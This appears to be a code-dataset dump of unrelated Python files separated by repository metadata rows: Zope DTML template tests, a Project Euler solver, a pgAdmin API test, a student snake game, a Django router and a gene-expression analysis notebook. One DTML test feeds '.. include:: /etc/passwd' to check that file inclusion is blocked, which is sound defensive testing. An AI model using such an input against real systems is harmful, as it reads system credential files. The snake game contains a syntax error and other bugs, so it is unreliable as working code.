cents=
dollars,=
cents,=
<a href="spam">
foo bar
html=<a href="spam">
foo bar
url=%3Ca%20href%3D%22spam%22%3E%0Afoo%20bar
multi=<a href="spam"><br />
foo bar
dollars=
cents=
dollars,=
cents,=''')
res = html(spam=4200000) + html(spam=None) + html(
spam='<a href="spam">\nfoo bar')
self.assertEqual(res,expected)
def test_fmt_reST_include_directive_raises(self):
source = '.. include:: /etc/passwd'
html = self.doc_class('<dtml-var name="foo" fmt="restructured-text">')
html._vars['foo'] = source
self.assertRaises(NotImplementedError, html)
def test_fmt_reST_raw_directive_disabled(self):
EXPECTED = '<h1>HELLO WORLD</h1>'
source = '.. raw:: html\n\n %s\n' % EXPECTED
html = self.doc_class('<dtml-var name="foo" fmt="restructured-text">')
html._vars['foo'] = source
result = html() # don't raise, but don't work either
self.failIf(EXPECTED in result)
self.failUnless(""raw" directive disabled" in result)
from cgi import escape
self.failUnless(escape(EXPECTED) in result)
def test_fmt_reST_raw_directive_file_option_raises(self):
source = '.. raw:: html\n :file: inclusion.txt'
html = self.doc_class('<dtml-var name="foo" fmt="restructured-text">')
html._vars['foo'] = source
self.assertRaises(NotImplementedError, html, source)
def test_fmt_reST_raw_directive_url_option_raises(self):
source = '.. raw:: html\n :url: http://www.zope.org'
html = self.doc_class('<dtml-var name="foo" fmt="restructured-text">')
html._vars['foo'] = source
self.assertRaises(NotImplementedError, html, source)
def testPropogatedError(self):
class foo:
def __len__(self): return 9
def __getitem__(self,i):
if i >= 9: raise IndexError, i
return self.testob(i)
class testob (Base):
__roles__ = None # Public
def __init__(self, index):
self.index = index
self.value = 'item %s' % index
getValue__roles__ = None # Public
def getValue(self):
return self.value
puke__roles__ = None # Public
def puke(self):
raise PukeError('raaalf')
html=self.doc_class(
"""
<dtml-if spam>
<dtml-in spam>
<dtml-var getValue>
<dtml-var puke>
</dtml-in spam>
</dtml-if spam>
""")
try:
html(spam=foo())
except PukeError:
# Passed the test.
pass
else:
assert 0, 'Puke error not propogated'
def testRenderCallable(self):
"Test automatic rendering of callable objects"
class C (Base):
__allow_access_to_unprotected_subobjects__ = 1
x=1
def y(self): return self.x*2
C.h = self.doc_class("The h method, <dtml-var x> <dtml-var y>")
C.h2 = self.doc_class("The h2 method")
expected = "1, 2, The h method, 1 2"
res = self.doc_class("<dtml-var x>, <dtml-var y>, <dtml-var h>")(C())
assert res == expected, res
expected = (
'''
1,
2,
The h2 method''')
res = self.doc_class(
'''
<dtml-var expr="_.render(i.x)">,
<dtml-var expr="_.render(i.y)">,
<dtml-var expr="_.render(i.h2)">''')(i=C())
assert res == expected, res
def testWith(self):
class person:
__allow_access_to_unprotected_subobjects__ = 1
name='Jim'
height_inches=73
expected = 'Hi, my name is %s and my height is %d cm.' % (
person.name, int(person.height_inches * 2.54))
res = self.doc_class(
'<dtml-with person>Hi, my name is <dtml-var name> '
'and my height is <dtml-var "_.int(height_inches*2.54)"> '
'cm.</dtml-with>')(person=person)
assert res == expected, res
def testRaise(self):
try:
res = self.doc_class(
"<dtml-raise IndexError>success!</dtml-raise>")()
except IndexError, v:
res = v
assert str(res) == 'success!', `res`
def testNoItemPush(self):
data=d(sec='B', name='XXX', sub=(d(name='b1'),d(name='b2',sec='XXX')))
html = """
<dtml-with data mapping><dtml-in sub no_push_item>
<dtml-var sec>.<dtml-with sequence-item mapping><dtml-var name></dtml-with>
</dtml-in></dtml-with>
"""
expected = """
B.b1 B.b2"""
result = self.doc_class(html)(data=data)
assert result == expected, result
def testBasicHTMLIn(self):
data=(
d(name='jim', age=39),
d(name='kak', age=29),
d(name='will', age=8),
d(name='andrew', age=5),
d(name='chessie',age=2),
)
html="""
<!--#in data mapping-->
<!--#var name-->, <!--#var age-->
<!--#/in-->
"""
expected = """
jim, 39
kak, 29
will, 8
andrew, 5
chessie, 2
"""
result = self.doc_class(html)(data=data)
assert result == expected, result
def testBasicHTMLIn2(self):
xxx=(D(name=1), D(name=2), D(name=3))
html = """
<!--#in xxx-->
<!--#var name -->
<!--#/in-->
"""
expected = """
1
2
3
"""
result = self.doc_class(html)(xxx=xxx)
assert result == expected, result
def testBasicHTMLIn3(self):
ns = {'prop_ids': ('title', 'id'), 'title': 'good', 'id': 'times'}
html = """:<dtml-in prop_ids><dtml-var sequence-item>=<dtml-var
expr="_[_['sequence-item']]">:</dtml-in>"""
result = self.doc_class(html)(None, ns)
expected = ":title=good:id=times:"
assert result == expected, result
def testHTMLInElse(self):
xxx=(D(name=1), D(name=2), D(name=3))
html="""
<!--#in data mapping-->
<!--#var name-->, <!--#var age-->
<!--#else-->
<!--#in xxx-->
<!--#var name -->
<!--#/in-->
<!--#/in-->
"""
expected = """
1
2
3
"""
result = self.doc_class(html)(xxx=xxx, data={})
assert result == expected, result
def testBasicStringIn(self):
data=(
d(name='jim', age=39),
d(name='kak', age=29),
d(name='will', age=8),
d(name='andrew', age=5),
d(name='chessie',age=2),
)
s="""
%(in data mapping)[
%(name)s, %(age)s
%(in)]
"""
expected = """
jim, 39
kak, 29
will, 8
andrew, 5
chessie, 2
"""
result = String(s)(data=data)
assert expected == result, result
def test_suite():
suite = unittest.TestSuite()
suite.addTest( unittest.makeSuite( DTMLTests ) )
return suite
def main():
unittest.TextTestRunner().run(test_suite())
if __name__ == '__main__':
main()
| [
"root@cpro5106.publiccloud.com.br"
] | root@cpro5106.publiccloud.com.br |
d69de5a1d4c99f7f6e96fba9499c7fc95016b677 | 0f23caca0ae990204483f9de9f964510703f5f40 | /0004.py | 5795aa73bd9e8bd8fe9200cb576270ee03264014 | [] | no_license | moniq/Euler-project-python3 | df2bdabfb9296ce7b326560c8e44776d5140f24f | e22d6ab468a8afd190cbc04a711d3e96db181b1f | refs/heads/master | 2020-12-30T15:54:01.167722 | 2017-05-13T18:25:37 | 2017-05-13T18:25:37 | 91,178,214 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 769 | py | #=====================================
# PALINDROMIC NUMBER e.g. 9009, 90109
# https://projecteuler.net/problem=4
#=====================================
import profile
def is_palindromic(number):
# if number < 0 or has only one digit is not palindromic
if number-10 <= 0:
return False
st = str(number)
if st == st[::-1]:
return True
return False
def find_palindromic(limit_min, limit_max):
max_paldimore = [0, 0, 0] # x*y, x, y
for x in range(limit_max, limit_min, -1):
for y in range(x, limit_min, -1):
tmp = x * y
if tmp > max_paldimore[0] and is_palindromic(tmp):
max_paldimore = [tmp, x, y]
return max_paldimore
profile.run('print (find_palindromic(100, 999))')
| [
"noreply@github.com"
] | noreply@github.com |
7e862eae0d9148a1e0b88084c5981c3280296cc4 | 53b1cf89f3ac00d86add6dc6e103160d50e1b4ea | /pgadmin/pgadmin4/web/pgadmin/browser/server_groups/servers/tests/test_server_get.py | 338f7fcfb45c96ee37238b621d1a4a0c92353062 | [
"PostgreSQL"
] | permissive | luvres/armhf | b5e9e59c0e5db7f4a280242a0d940c4066a47716 | aa1ec48e246f1fb8e0f4099fa8d392eddcb414ad | refs/heads/master | 2021-10-01T19:08:53.395884 | 2018-11-28T17:57:42 | 2018-11-28T17:57:42 | 79,672,248 | 10 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,629 | py | # ##########################################################################
#
# #pgAdmin 4 - PostgreSQL Tools
#
# #Copyright (C) 2013 - 2016, The pgAdmin Development Team
# #This software is released under the PostgreSQL Licence
#
# ##########################################################################
from pgadmin.utils.route import BaseTestGenerator
from regression import test_utils as utils
from regression import parent_node_dict
class ServersGetTestCase(BaseTestGenerator):
"""
This class will fetch added servers under default server group
by response code.
"""
scenarios = [
# Fetch the default url for server node
('Default Server Node url', dict(url='/browser/server/obj/'))
]
def setUp(self):
"""This function add the server to test the GET API"""
self.server_id = utils.create_server(self.server)
server_dict = {"server_id": self.server_id}
utils.write_node_info("sid", server_dict)
def runTest(self):
""" This function will fetch the added servers to object browser. """
server_id = parent_node_dict["server"][-1]["server_id"]
if not server_id:
raise Exception("Server not found to test GET API")
response = self.tester.get(self.url + str(utils.SERVER_GROUP) + '/' +
str(server_id),
follow_redirects=True)
self.assertEquals(response.status_code, 200)
def tearDown(self):
"""This function delete the server from SQLite """
utils.delete_server_with_api(self.tester, self.server_id)
| [
"luvres@hotmail.com"
] | luvres@hotmail.com |
fec9542a490d26aa855dab0e2d6f204c0a65f190 | 55628a9a08a6b6646b4a8aa74bedbf2e3fd7d850 | /.history/master_20200126005041.py | 0cf75bdb067cd902873d4068cf323f8de7ac42e3 | [] | no_license | StRobertCHSCS/final-project-team | c115dc11b318f7ac782c94860a8801bb558bd107 | 48907e72813c4dd3b48ff36f794f6fce04533219 | refs/heads/master | 2020-12-03T22:35:37.833893 | 2020-01-31T04:05:38 | 2020-01-31T04:05:38 | 231,506,873 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,880 | py | '''
-**make snake longer when eaten
- FIGURE OUT HOW TO KNOW WHERE TO ADD THE NEXT BLOCK (MOVE LAST LOCATION TO BACK)
DONEEE
-fix player_location lists, so that the list only has the location of the current snake location, not infinite list (done)
- fix apple so disappers when you go over it (done)
- add score (done)
-fix speed so that it resets when you go back to main page
- add high score page (txt file, saves high scores outside of program)
'''
import arcade
import random
import json
import time
# Starting screen
alive_button = []
start_button_text = ["Noob: 0.5 speed \n (Refresh rate 1/5 seconds)",
"Normal speed: 1 \n (Refresh rate 1/10 seconds)",
"Hard: 1.5 speed \n (Refresh rate 1/15 seconds)",
"Expert: 2.5 speed \n (Refresh rate 1/25 seconds)"]
for i in range (2, 10, 2):
start_options = [i*100, 200, 150, 50, start_button_text[(i // 2) - 1]] # x, y, width, height
alive_button.append(start_options)
show_text = False
# Set how many rows and columns we will have
ROW_COUNT = 29
COLUMN_COUNT = 51
# This sets the WIDTH and HEIGHT of each grid location
WIDTH = 20
HEIGHT = 20
# This sets the margin between each cell
# and on the edges of the screen.
MARGIN = 5
# Do the math to figure out our screen dimensions
SCREEN_WIDTH = (WIDTH + MARGIN) * COLUMN_COUNT + MARGIN
SCREEN_HEIGHT = (HEIGHT + MARGIN) * ROW_COUNT + MARGIN
# Death screen
dead_button = []
death_button_text = ["Retry", "Starting screen", "High scores", "Quit"]
text_num = 0
for x in range (1, 5, 2):
for y in range (1, 5, 2):
death_options = [x*(SCREEN_WIDTH//4) - 75, y*(SCREEN_HEIGHT//4) - 75 , 150, 150, death_button_text[text_num]] # x, y, width, height
dead_button.append(death_options)
text_num += 1
# Direction the snake is moving in
up = False
down = False
left = False
right = False
# Use snakes position shown on grid, not the python coordinates
player_x_column = 5
player_y_row = 5
# Length of the snake body
body = 1
# Current snake location
snake_pos = []
# Determine where the starting apple will be drawn in
apple_x = random.randint(0, COLUMN_COUNT)
apple_y = random.randint(0, ROW_COUNT)
# Boolean to see if apple needs to be moved
apple_display = True
# Background grid
grid_texture = arcade.load_texture("29x51_grid.jpg")
score = 0
# Landing page, game, death screen, or high score
page = 0
SPEED = 1
high_score = 0
time = 0
millisecond = 0
second = 0
red = 0
green = 255
blue = 0
def on_update(delta_time):
snake_move()
def on_draw():
global page
arcade.start_render()
if page == 0:
start_screen()
elif page == 1:
main_game()
elif page == 2:
grid_background()
death_screen()
elif page == 3:
high_score_page()
print(time)
def stop_watch():
global time, second, millisecond
time += 1
if (time * SPEED) % SPEED == 0):
millisecond += 1
if (time % SPEED == 0):
second += 1
minute = int(second//60)
arcade.draw_text(f"Time: {minute:02d}:{second:02d}: {millisecond: 01d}", 75, SCREEN_HEIGHT - 50, arcade.color.BLUE,
25, font_name='calibri', bold = True, anchor_x="center", anchor_y="center")
def high_score_check():
global high_score, score
with open("high_score.json", "r") as high_score_file:
high_score = json.load(high_score_file)
with open("high_score.json", "w") as high_score_file:
if score > high_score:
json.dump(score, high_score_file)
else:
json.dump(high_score, high_score_file)
def high_score_page():
global high_score
high_score_check()
arcade.draw_text("The high score is " + str(high_score), SCREEN_WIDTH //2, SCREEN_HEIGHT // 2,
arcade.color.WHITE, 50, font_name='calibri', anchor_x="center", anchor_y="center")
def main_game():
grid_background()
snake()
apple()
stop_watch()
def start_screen():
global alive_button
arcade.draw_text("Welcome to snake \n choose your level", (SCREEN_WIDTH//2), 3*(SCREEN_HEIGHT//4),
arcade.color.WHITE, 25, font_name='calibri', anchor_x="center", anchor_y="center")
# arcade.draw_text(str(current_time), (3 * SCREEN_WIDTH // 4), (SCREEN_HEIGHT//4),
# arcade.color.BLACK, 25, font_name='calibri', anchor_x="center", anchor_y="center")
for i in range (0, 4):
arcade.draw_xywh_rectangle_filled(alive_button[i][0],
alive_button[i][1],
alive_button[i][2],
alive_button[i][3],
arcade.color.WHITE)
arcade.draw_text(alive_button[i][4], alive_button[i][0] + (alive_button[i][2] // 2), alive_button[i][1] + (alive_button[i][3] // 2),
arcade.color.BLACK, 10, font_name='calibri', anchor_x="center", anchor_y="center")
def death_screen():
global dead_button, death_button_text, red, green, blue
if (red == 255 and 0 <= green < 255 and blue == 0):
green += 5
elif (0 < red <= 255 and green == 255 and blue == 0):
red -= 5
elif (red == 0 and green == 255 and 0 <= blue < 255):
blue += 5
elif (red == 0 and 0 < green <= 255 and blue == 255):
green -= 5
elif (0 <= red < 255 and green == 0 and blue == 255):
red += 5
elif (red == 255 and green == 0 and 0 < blue <= 255):
blue -= 5
for i in range (2):
arcade.draw_text("You died rip lol", random.randint(50, SCREEN_WIDTH), random.randint(50, SCREEN_HEIGHT), (random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)),
50, font_name='calibri', bold = True, anchor_x="center", anchor_y="center")
for i in range (0, 4):
arcade.draw_xywh_rectangle_filled(dead_button[i][0],
dead_button[i][1],
dead_button[i][2],
dead_button[i][3],
(red, blue, green))
arcade.draw_text(dead_button[i][4], dead_button[i][0] + (dead_button[i][2] // 2), dead_button[i][1] + (dead_button[i][3] // 2),
arcade.color.BLACK, 15, font_name='calibri', anchor_x="center", anchor_y="center")
def grid_background():
arcade.draw_texture_rectangle(SCREEN_WIDTH//2, SCREEN_HEIGHT//2, grid_texture.width, grid_texture.height, grid_texture, 0)
def snake_move():
global player_x, player_y, player_x_column, player_y_row
global snake_pos
global page, score
if (0 <= player_x_column < COLUMN_COUNT) and (0 <= player_y_row < ROW_COUNT):
if up:
player_y_row += 1
elif down:
player_y_row -= 1
elif right:
player_x_column += 1
elif left:
player_x_column -= 1
else:
page = 2
suicide_check = []
for position in snake_pos:
if position not in suicide_check:
suicide_check.append(position)
else:
page = 2
# Player coordinates
player_x = (MARGIN + WIDTH) * player_x_column + MARGIN + WIDTH // 2
player_y = (MARGIN + HEIGHT) * player_y_row + MARGIN + HEIGHT // 2
def restart():
global player_x_column, player_y_row, snake_len, body, snake_pos
global up, down, left, right
global page, score, time
player_x_column = 5
player_y_row = 5
snake_len = []
body = 1
snake_pos = []
up = False
down = False
left = False
right = False
page = 1
score = 0
time = 0
print ("You died")
def snake():
global player_x_column, player_y_row, snake_len, body
global apple_x, apple_y
arcade.draw_rectangle_filled(player_x , player_y, WIDTH, HEIGHT, arcade.color.BLUE)
snake_len = [[player_x_column, player_y_row]]
snake_pos.append([player_x_column, player_y_row])
if body < len(snake_pos):
snake_pos.pop(0)
if (body > 1):
for num in range (1, body):
snake_len.append([snake_pos[num - 1][0], snake_pos[num - 1][1]])
for i in range (body):
arcade.draw_rectangle_filled(
(MARGIN + WIDTH) * snake_len[i][0] + MARGIN + WIDTH // 2,
(MARGIN + HEIGHT) * snake_len[i][1] + MARGIN + HEIGHT // 2 ,
WIDTH, HEIGHT, arcade.color.BLUE)
def apple():
global apple_x, apple_y, apple_x_coordinate, apple_y_coordinate, body, snake_len
global score
global SPEED
apple_x_coordinate = (MARGIN + WIDTH) * apple_x + MARGIN + WIDTH // 2
apple_y_coordinate = (MARGIN + HEIGHT) * apple_y + MARGIN + HEIGHT // 2
if (player_x_column == apple_x) and (player_y_row == apple_y):
apple_display = False
body += 1
print ("hit")
else:
apple_display = True
if apple_display is True:
arcade.draw_rectangle_filled(apple_x_coordinate, apple_y_coordinate, WIDTH, HEIGHT, arcade.color.RED)
elif apple_display is False:
apple_x = random.randint(0, COLUMN_COUNT)
apple_y = random.randint(0, ROW_COUNT)
# Make sure that apple doesn't spawn where the snake is
for apple in range (len(snake_pos)):
if apple_x == snake_pos[apple][0] or apple_y == snake_pos[apple][1]:
apple_x = random.randint(0, COLUMN_COUNT)
apple_y = random.randint(0, ROW_COUNT)
apple_x_coordinate = (MARGIN + WIDTH) * apple_x + MARGIN + WIDTH // 2
apple_y_coordinate = (MARGIN + HEIGHT) * apple_y + MARGIN + HEIGHT // 2
score += 10
apple_display == True
arcade.draw_text("Score is " + str(score), SCREEN_WIDTH - 75, SCREEN_HEIGHT - 50, arcade.color.GREEN,
25, font_name='calibri', bold = True, anchor_x="center", anchor_y="center")
def on_key_press(key, modifiers):
global up, down, left, right
if page == 1:
if (key == arcade.key.W) and (down == False):
up = True
down = False
right = False
left = False
elif (key == arcade.key.S) and (up == False):
down = True
up = False
right = False
left = False
elif (key == arcade.key.A) and (right == False):
left = True
up = False
down = False
right = False
elif (key == arcade.key.D) and (left == False):
right = True
up = False
down = False
left = False
def on_key_release(key, modifiers):
pass
def on_mouse_press(x, y, button, modifiers):
global alive_button, dead_button, page
global start_screen, restart
global high_score_page
global SPEED
if page == 0:
# For starting screen, check which button has been clicked
if (x > alive_button[0][0] and x < alive_button[0][0] + alive_button[0][2] and
y > alive_button[0][1] and y < alive_button[0][1] + alive_button[0][3]):
page += 1
SPEED = 5
arcade.schedule(on_update, 1/(SPEED))
print("noob")
elif (x > alive_button[1][0] and x < alive_button[1][0] + alive_button[1][2] and
y > alive_button[1][1] and y < alive_button[1][1] + alive_button[1][3]):
page += 1
SPEED = 10
arcade.schedule(on_update, 1/(SPEED))
print("normal")
elif (x > alive_button[2][0] and x < alive_button[2][0] + alive_button[2][2] and
y > alive_button[2][1] and y < alive_button[2][1] + alive_button[2][3]):
page += 1
SPEED = 15
arcade.schedule(on_update, 1/(SPEED))
print("hard")
elif (x > alive_button[3][0] and x < alive_button[3][0] + alive_button[3][2] and
y > alive_button[3][1] and y < alive_button[3][1] + alive_button[3][3]):
page += 1
SPEED = 25
arcade.schedule(on_update, 1/(SPEED))
print("expert")
else:
SPEED = 1
if page == 2:
if (x > dead_button[0][0] and x < dead_button[0][0] + dead_button[0][2] and
y > dead_button[0][1] and y < dead_button[0][1] + dead_button[0][3]):
restart()
print("try again")
elif (x > dead_button[1][0] and x < dead_button[1][0] + dead_button[1][2] and
y > dead_button[1][1] and y < dead_button[1][1] + dead_button[1][3]):
start_screen()
print("main")
elif (x > dead_button[2][0] and x < dead_button[2][0] + dead_button[2][2] and
y > dead_button[2][1] and y < dead_button[2][1] + dead_button[2][3]):
high_score_page()
print("high score")
elif (x > dead_button[3][0] and x < dead_button[3][0] + dead_button[3][2] and
y > dead_button[3][1] and y < dead_button[3][1] + dead_button[3][3]):
print("exit")
arcade.close_window()
def setup():
global grid, SPEED
# SPEED = float(input("What fast do you want? \n Noob: Type 0.5 \n Normal: Type 1 \n Hard: Type 1.5 - 2 \n Expert: Type 2.5 or more \n *Changes the refresh rate* \n"))
arcade.open_window(SCREEN_WIDTH, SCREEN_HEIGHT, "snake")
arcade.set_background_color(arcade.color.BLACK)
arcade.schedule(on_update, 1/SPEED)
# Override arcade window methods
window = arcade.get_window()
window.on_draw = on_draw
window.on_key_press = on_key_press
window.on_key_release = on_key_release
window.on_mouse_press = on_mouse_press
arcade.run()
if __name__ == '__main__':
setup()
| [
"clementina1023@gmail.com"
] | clementina1023@gmail.com |
4a383f71e3669538aef1ec2f18596c59815832a7 | 58716860230fd5cfc55355c6d603d8d2eb18646d | /libmodel/django/database_router.py | 19f1cef2c09e36040d61c5f15c3e569e444b23d7 | [
"MIT"
] | permissive | caser789/libmodel | f29b402fd5710d36a8e32c3670cfe89b50e0cfe9 | 8a063737ad568d3f9c4f7ddd78680582f71380f4 | refs/heads/master | 2020-05-18T15:55:31.376819 | 2019-05-06T09:07:47 | 2019-05-06T09:07:47 | 184,513,510 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 649 | py | class DatabaseRouter(object):
def db_for_read(self, model, **hints):
if hasattr(model, 'Config'):
if hasattr(model.Config, 'db_for_read'):
return model.Config.db_for_read
elif hasattr(model.Config, 'db_for_all'):
return model.Config.db_for_all
return 'default'
def db_for_write(self, model, **hints):
if hasattr(model, 'Config'):
if hasattr(model.Config, 'db_for_write'):
return model.Config.db_for_write
elif hasattr(model.Config, 'db_for_all'):
return model.Config.db_for_all
return 'default'
| [
"jiao.xue@jiaoxue-mac.local"
] | jiao.xue@jiaoxue-mac.local |
1965d7d331cb5c014adede3f2bcbec2a73c14682 | 151d03ad99ae6100030a4f78c6c460f8541412b5 | /new_model_unseen_template/2_run_analysis_example.py | 30e038f61fdfb45feb5416c7bbfdd8d55dd0d352 | [
"BSD-3-Clause"
] | permissive | greenelab/sophie | 4dcb0bb5b35ac5794b40c7cc20377da6b5906807 | 5f07d8558890dca44202010f9e054f28735fae4a | refs/heads/main | 2023-05-29T15:44:36.029820 | 2022-07-05T19:06:29 | 2022-07-05T19:06:29 | 485,827,739 | 5 | 1 | BSD-3-Clause | 2022-07-05T19:06:30 | 2022-04-26T14:44:51 | Python | UTF-8 | Python | false | false | 14,545 | py | # ---
# jupyter:
# jupytext:
# formats: ipynb,py
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.9.1
# kernelspec:
# display_name: Python [conda env:sophie] *
# language: python
# name: conda-env-sophie-py
# ---
# # Template
#
# This notebook allows users to find common and specific genes in their experiment of interest using an *existing* VAE model (model trained by the user using `1_train_example.pynb`) and selecting a template experiment that is *not* included in the training compendium.
#
# This notebook will generate a `generic_gene_summary_<experiment id>.tsv` file that contains z-scores per gene that indicates how specific a gene is the experiment in question.
# %load_ext autoreload
# %load_ext rpy2.ipython
# %autoreload 2
import os
import pandas as pd
import seaborn as sns
import numpy as np
import matplotlib.pyplot as plt
from ponyo import utils, simulate_expression_data
from sophie import (
process,
stats,
ranking,
)
# ## Inputs
#
# User needs to fill in the [config file](config_new_experiment.tsv) following the instructions provided in the [readme]](README.md)
# +
# Read in config variables
config_filename = "config_example.tsv"
params = utils.read_config(config_filename)
# +
# Load config params
# Root directory containing analysis subdirectories and scripts
base_dir = params["base_dir"]
# Local directory to store intermediate files
local_dir = params["local_dir"]
# File containing un-normalized template experiment
raw_template_filename = params["raw_template_filename"]
# Un-normalized compendium filename
raw_compendium_filename = params["raw_compendium_filename"]
# Normalized compendium filename
normalized_compendium_filename = params["normalized_compendium_filename"]
# ID for template experiment to be selected
project_id = params["project_id"]
# Number of simulated experiments to generate
num_simulated = params["num_simulated"]
# Directory that simulated experiments will be written to
# This directory is created by https://github.com/greenelab/ponyo/blob/master/ponyo/utils.py
simulated_data_dir = params["simulated_data_dir"]
# Directory containing trained VAE model
vae_model_dir = params["vae_model_dir"]
# Size of the latent dimension
latent_dim = params["latent_dim"]
# Scaler transform used to scale compendium data into 0-1 range for training
scaler_transform_filename = params["scaler_transform_filename"]
# Which DE method to use
# We recommend that if data is RNA-seq then use DESeq2 ("deseq")
# If data is microarray then use Limma ("limma")
de_method = params["DE_method"]
# If using DE-seq, setting this parameter will
# remove genes below a certain threshold
count_threshold = params["count_threshold"]
# Metadata file that specifies which samples to keep for DE analysis (Optional)
# By default, a two-condition differential expression analysis is supported (case vs control).
# However, some experiments included more than 2 conditions and so these "extra" samples
# should not considered in the downstream differential expression analysis.
template_process_samples_filename = params["template_process_samples_filename"]
# Metadata file that specifies sample grouping for DE analysis
template_DE_grouping_filename = params["template_DE_grouping_filename"]
# Statistic to use to rank genes or pathways by
# Choices are "log2FoldChange" if using DESeq or "log2FC"
# if using limma as the `de_method`
col_to_rank_genes = params["rank_genes_by"]
# +
# Files generated by this notebook
# File storing template experiment with gene ids mapped to compendium gene ids
mapped_template_filename = params["mapped_template_filename"]
# File storing normalized template experiment
normalized_template_filename = params["normalized_template_filename"]
# File storing processed template experiment,
# after samples have been selected for comparison in DE analysis
processed_template_filename = params["processed_template_filename"]
# Output summary file
output_filename = params["output_filename"]
# -
# ## Process template experiment
#
# This step:
# 1. Normalizes the template experiment such that the template experiment and compendium experiment are in the same range
# 2. Ensures that the feature space (i.e. gene ids) are the same in the template and compendium
#
# The template experiment is expected to have the same genes as the compendium experiment. Genes that are in the template experiment but not in the compendium are removed. Genes that are in the compendium but missing in the template experiment are added and the gene expression value is set to the median gene expression value of that gene across the samples in the compendium. Additionally, the template values are expected to come from the same distribution as the compendium dataset (i.e. both the template and compendium expression measurements are estimated counts). This is necessary since SOPHIE applies the same scale factor used to normalize the compendium to normalize the template experiment. If the template has a different range of expression values, then the scaling will result in outliers (i.e. values greater than 1) which the cross entropy loss in the VAE will not handle.
simulate_expression_data.process_template_experiment(
raw_template_filename,
raw_compendium_filename,
scaler_transform_filename,
mapped_template_filename,
normalized_template_filename,
)
# ## Simulate data
# Run simulation
simulate_expression_data.embed_shift_template_experiment(
normalized_compendium_filename,
normalized_template_filename,
vae_model_dir,
project_id,
scaler_transform_filename,
local_dir,
latent_dim,
num_simulated,
simulated_data_dir,
)
# ## Process template and simulated experiments
#
# * Remove samples not required for comparison
# * Make sure ordering of samples matches metadata for proper comparison
# * Make sure values are cast as integers if using DESeq
# * Filter lowly expressed genes if using DESeq
# +
## Update simulated dir
if not os.path.exists(template_process_samples_filename):
template_process_samples_filename = None
if de_method == "deseq":
# Process template data
stats.process_samples_for_DESeq(
raw_template_filename,
template_DE_grouping_filename,
processed_template_filename,
count_threshold,
template_process_samples_filename,
)
# Process simulated data
for i in range(num_simulated):
simulated_filename = os.path.join(
simulated_data_dir,
f"selected_simulated_data_{project_id}_{i}.tsv",
)
out_simulated_filename = os.path.join(
simulated_data_dir,
f"selected_simulated_data_{project_id}_{i}_processed.tsv",
)
stats.process_samples_for_DESeq(
simulated_filename,
template_DE_grouping_filename,
out_simulated_filename,
count_threshold,
template_process_samples_filename,
)
else:
stats.process_samples_for_limma(
raw_template_filename,
template_DE_grouping_filename,
processed_template_filename,
template_process_samples_filename,
)
for i in range(num_simulated):
simulated_filename = os.path.join(
simulated_data_dir,
f"selected_simulated_data_{project_id}_{i}.tsv",
)
stats.process_samples_for_limma(
simulated_filename,
template_DE_grouping_filename,
None,
template_process_samples_filename,
)
# -
# ## Differential expression analysis
# Create subdirectory: "<local_dir>/DE_stats/"
os.makedirs(os.path.join(local_dir, "DE_stats"), exist_ok=True)
# + magic_args="-i template_DE_grouping_filename -i project_id -i processed_template_filename -i local_dir -i base_dir -i de_method" language="R"
#
# source(paste0(base_dir, '/sophie/DE_analysis.R'))
#
# # File created: "<local_dir>/DE_stats/DE_stats_template_data_<project_id>_real.txt"
# if (de_method == "deseq"){
# get_DE_stats_DESeq(
# template_DE_grouping_filename,
# project_id,
# processed_template_filename,
# "template",
# local_dir,
# "real"
# )
# }
# else{
# get_DE_stats_limma(
# template_DE_grouping_filename,
# project_id,
# processed_template_filename,
# "template",
# local_dir,
# "real"
# )
# }
# + magic_args="-i template_DE_grouping_filename -i project_id -i base_dir -i simulated_data_dir -i num_simulated -i de_method" language="R"
#
# source(paste0(base_dir, '/sophie/DE_analysis.R'))
#
# # Files created: "<local_dir>/DE_stats/DE_stats_simulated_data_<project_id>_<n>.txt"
# for (i in 0:(num_simulated-1)){
# simulated_data_filename <- paste(
# simulated_data_dir,
# "/selected_simulated_data_",
# project_id,
# "_",
# i,
# "_processed.tsv",
# sep = ""
# )
# if (de_method == "deseq"){
# get_DE_stats_DESeq(
# template_DE_grouping_filename,
# project_id,
# simulated_data_filename,
# "simulated",
# local_dir,
# i
# )
# }
# else {
# get_DE_stats_limma(
# template_DE_grouping_filename,
# project_id,
# simulated_data_filename,
# "simulated",
# local_dir,
# i
# )
# }
# }
# -
# ## Rank genes
#
# Genes are ranked by their "generic-ness" - how frequently these genes are changed across the simulated experiments using user-specific test statistic provided in the `col_to_rank_genes` params (i.e. log2 fold change).
# +
analysis_type = "DE"
template_DE_stats_filename = os.path.join(
local_dir, "DE_stats", f"DE_stats_template_data_{project_id}_real.txt"
)
# Added
if de_method == "deseq":
logFC_name = "log2FoldChange"
pvalue_name = "padj"
else:
logFC_name = "logFC"
pvalue_name = "adj.P.Val"
template_DE_stats, simulated_DE_summary_stats = ranking.process_and_rank_genes_pathways(
template_DE_stats_filename,
local_dir,
num_simulated,
project_id,
analysis_type,
col_to_rank_genes,
logFC_name,
pvalue_name,
)
# -
# ## Summary table
#
# * Gene ID: Gene identifier (hgnc symbols for human data or PA number for *P. aeruginosa* data)
# * (Real): Statistics for template experiment
# * (Simulated): Statistics across simulated experiments
# * Number of experiments: Number of simulated experiments
# * Z-score: High z-score indicates that gene is more changed in template compared to the null set of simulated experiments (high z-score = highly specific to template experiment). These z-scores are true standard scores using mean and standard deviation. The calculation for the z-score for a given gene is
#
# $$
# \frac{\text{log}_2 \text{fold change of the gene in the template experiment} - mean(\text{log}_2 \text{fold change of the gene in simulated experiments)}}{variance(\text{log}_2 \text{fold change of the gene in simulated experiments)}}
# $$
#
# The range of this z-score will vary depending on the number of simulated experiments, so the number of simulated experiments should be held constant if the user is performing multiple SOPHIE runs or if they're comparing to previous SOPHIE runs performed by someone else.
#
# * Percentile (simulated): percentile rank of the median(abs(log fold change)). So its the median absolute change for that gene across the 25 simulated experiments that is then converted to a percentile rank from 0 - 100. Where a higher percentile indicates that the gene was highly changed frequently and would suggest that the gene is more commonly DE.
